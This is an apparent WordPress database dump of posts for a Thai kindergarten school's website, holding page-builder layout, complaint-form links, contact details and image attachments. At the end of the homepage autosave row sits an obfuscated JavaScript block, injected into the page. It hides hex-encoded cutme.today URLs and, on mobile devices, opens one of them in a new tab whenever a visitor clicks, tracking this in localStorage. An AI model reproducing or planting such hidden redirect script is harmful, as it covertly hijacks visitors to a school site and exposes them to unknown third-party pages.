-->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-autosave-v1','','','2025-11-13 11:59:56','2025-11-13 04:59:56','',19,'http://watprato.ssk.in.th/?p=760',0,'revision','',0),
(761,1,'2025-11-17 11:19:52','2025-11-17 04:19:52','','582270586_122256729548202781_1342293203871796833_n','','inherit','open','closed','','582270586_122256729548202781_1342293203871796833_n','','','2025-11-17 11:19:52','2025-11-17 04:19:52','',0,'http://watprato.ssk.in.th/wp-content/uploads/2025/11/582270586_122256729548202781_1342293203871796833_n.jpg',0,'attachment','image/jpeg',0),
(768,1,'2025-11-17 11:31:34','2025-11-17 04:31:34','','582270586_122256729548202781_1342293203871796833_n','','inherit','open','closed','','582270586_122256729548202781_1342293203871796833_n-2','','','2025-11-17 11:31:34','2025-11-17 04:31:34','',0,'http://watprato.ssk.in.th/wp-content/uploads/2025/11/582270586_122256729548202781_1342293203871796833_n-1.jpg',0,'attachment','image/jpeg',0),
(771,1,'2025-11-17 11:40:57','2025-11-17 04:40:57','','1','','inherit','open','closed','','1','','','2025-11-17 11:40:57','2025-11-17 04:40:57','',0,'http://watprato.ssk.in.th/wp-content/uploads/2025/11/1.jpg',0,'attachment','image/jpeg',0),
(773,1,'2025-11-17 11:41:54','2025-11-17 04:41:54','','582270586_122256729548202781_1342293203871796833_n','','inherit','open','closed','','582270586_122256729548202781_1342293203871796833_n-3','','','2025-11-17 11:41:54','2025-11-17 04:41:54','',0,'http://watprato.ssk.in.th/wp-content/uploads/2025/11/582270586_122256729548202781_1342293203871796833_n-2.jpg',0,'attachment','image/jpeg',0),
(775,1,'2026-03-27 10:57:57','0000-00-00 00:00:00','','บันทึกฉบับร่างอัตโนมัติ','','auto-draft','open','open','','','','','2026-03-27 10:57:57','0000-00-00 00:00:00','',0,'http://watprato.ssk.in.th/?p=775',0,'post','',0),
(776,1,'2026-03-27 11:26:38','2026-03-27 04:26:38','<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":777,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2026/03/ilovepdf_merged_page-0001-1024x724.jpg\" alt=\"\" class=\"wp-image-777\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:image {\"id\":778,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2026/03/ilovepdf_merged_page-0002-1024x724.jpg\" alt=\"\" class=\"wp-image-778\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":779,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2026/03/ilovepdf_merged_page-0003-1024x724.jpg\" alt=\"\" class=\"wp-image-779\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":780,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2026/03/ilovepdf_merged_page-0004-1024x724.jpg\" alt=\"\" class=\"wp-image-780\"/></figure>\n<!-- /wp:image 